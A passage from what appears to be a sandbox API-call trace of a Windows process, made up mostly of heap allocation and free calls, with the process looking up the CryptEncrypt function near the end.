(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0201.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0201.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0201.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0201.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0201.875] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0201.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0201.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0201.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0201.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0201.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0201.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0201.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0201.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0201.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0201.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0201.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0201.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0201.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0201.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0201.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x1297020 [0201.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0201.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0201.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x13a9020 [0201.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0201.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0201.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0201.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0201.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0201.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0201.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1297020 | out: hHeap=0x970000) returned 1 [0202.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0202.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0202.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0202.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x13a9020 | out: hHeap=0x970000) returned 1 [0202.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0202.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0202.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0202.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0202.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0202.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0202.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0202.033] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0202.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0202.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0202.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0202.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0202.033] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0202.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0202.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0202.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0202.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0202.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0202.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0202.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0202.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0202.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0202.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0202.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0202.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0202.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0202.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0202.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0202.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0202.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0202.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0202.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0202.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0202.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0202.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0202.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0202.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0202.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0202.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0202.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0202.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0202.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0202.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0202.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0202.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0202.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0202.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0202.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0202.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0202.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0202.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0202.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0202.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0202.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0202.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0202.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0202.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0202.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0202.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0202.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0202.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0202.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0202.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0202.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0202.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0202.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0202.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0202.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0202.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0202.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0202.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0202.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0202.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0202.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0202.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0202.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0202.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0202.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0202.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0202.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0202.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0202.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x129a020 [0202.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0202.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x129a020 | out: hHeap=0x970000) returned 1 [0202.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0202.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0202.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0202.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0202.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0202.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0202.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0202.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0202.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0202.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0202.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0202.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0202.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0202.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0202.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0202.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0202.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0202.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0202.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0202.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0202.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0202.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0202.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0202.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0202.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0202.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0202.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0202.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0202.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0202.060] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0202.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0202.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0202.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0202.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0202.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0202.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0202.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0202.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0202.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0202.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0202.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0202.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0202.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0202.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0202.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0202.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0202.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0202.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0202.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0202.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0202.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0202.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0202.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0202.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0202.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0202.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0202.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0202.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0202.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0202.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0202.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0202.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0202.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0202.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0202.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0202.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0202.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0202.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0202.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0202.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0202.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0202.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0202.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0202.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0202.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0202.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0202.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0202.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0202.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0202.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0202.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0202.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0202.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0202.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0202.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0202.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0202.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0202.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0202.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0202.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0202.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0202.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0202.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0202.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0202.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0202.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0202.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0202.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0202.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0202.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0202.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0202.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0202.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0202.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0202.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0202.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0202.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0202.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50cb0 [0202.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50cb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0202.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0202.071] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0202.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0202.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0202.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e543f0 [0202.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0202.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0202.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0202.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0202.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0202.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0202.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0202.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0202.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0202.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0202.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0202.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0202.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0202.071] HeapFree (in: 